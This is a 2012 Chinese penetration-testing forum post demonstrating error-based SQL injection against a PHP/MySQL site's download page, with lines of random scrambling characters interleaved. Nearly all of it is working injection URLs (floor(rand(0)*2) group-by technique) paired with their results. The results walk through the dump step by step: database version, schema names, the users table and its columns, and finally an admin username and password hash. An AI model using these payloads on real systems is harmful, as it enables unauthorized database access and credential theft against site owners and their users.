找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1954|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666* }% p. t* B4 J; S# {

6 Q6 a9 H" i% _  r8 f: g9 n9 g: v之前想找个测试 没想到这有 可以测试下做个记录而已
4 z5 d6 l0 Z; p$ t
% s7 m! O7 `' o; C1 ]http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
  s' v* V3 E0 }3 S2 s3 k
/ E- f! L6 N& W6 S  d2 r+ T/data0/htdocs/leqi_new/app/myapp.php2 j6 z  a+ l6 F3 s
4 A: m" a; o( l4 W
或者  y+ _  I% t: U) z* h# Z' j! N
: c" k4 q9 u. r" ?3 b! x# E
/**********version()**********/ 5.1.49-log
+ y$ h8 A  i8 p8 t' X5 Nhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 X) j0 i' p  K+ j5 z/ A
* L3 A5 q. ?( e$ O/**********user()**********/  
; z' Z3 @! n+ {0 B& ]. G) e/ Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; A) T/ d4 F' Z! j0 d
  f, x3 u! ^+ k  V5 u  o' Y" [, U
/**********database()**********/  leqi7 }  f! Z$ D& A
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ b% G  C7 q" f4 `7 [( f1 \0 X
0 O3 Z1 F* k. u: Q7 _6 D
/**********limit依次递归爆库**********/& P, M6 s* L! o# `0 M0 J( l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; |* v9 ^: W$ k, y1 S7 d
information_schema8 t3 I6 B6 M& e# T* X* c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0039 y) ?1 y- f- X; y; m
leqi
) d6 U5 H! _6 C( _, ]( w- }http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0037 s" u7 y$ G9 W5 |
test5 t3 h3 e0 A- V. q- k

1 |! D( X/ d5 `1 z/ u  Z/**********limit依次递归爆表名**********/
, m/ \$ U2 j( Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* M6 G! _! O8 ?1 u* e; G( E
users
: `' D- L7 g3 r8 F7 a# S( I3 K) d' P( P. O' J! k
/**********limit依次递归爆字段名**********/1 o  \; n4 `4 o- t5 p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 ~6 [' W; F. }. W9 J
user_id,username,nickname,passwd,group_id
  W+ M7 u' x+ M) Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& n, d) X+ @9 p- W: u/wapc/5000_0005_003
, I  ^" f( A- g; n1 M2 G8 }0 K11 21/ C. \% M2 e. O6 j2 e& b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/ N, u' ~9 K1 J/ v/wapc/5000_0005_003
4 o1 [( u; j5 E, g# U' t11 341 351 361; T8 T1 w- H5 r7 l+ q5 s. n
/**********爆数据**********/
& ?  u2 K* m$ D0 j5 L7 O3 g6 Dhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 a9 b1 ?# M( X/ q3 c
admin+ i1 F% d1 P9 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. R& m, a, K$ l" K& y# \
6a8b4574ca231eb8bd52764d4978ffcd3 Q$ ?* z0 G* N+ C2 V* z
6 k$ B  I( B8 b' @$ M7 B
! J( }; ^5 |4 ]. {' p
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表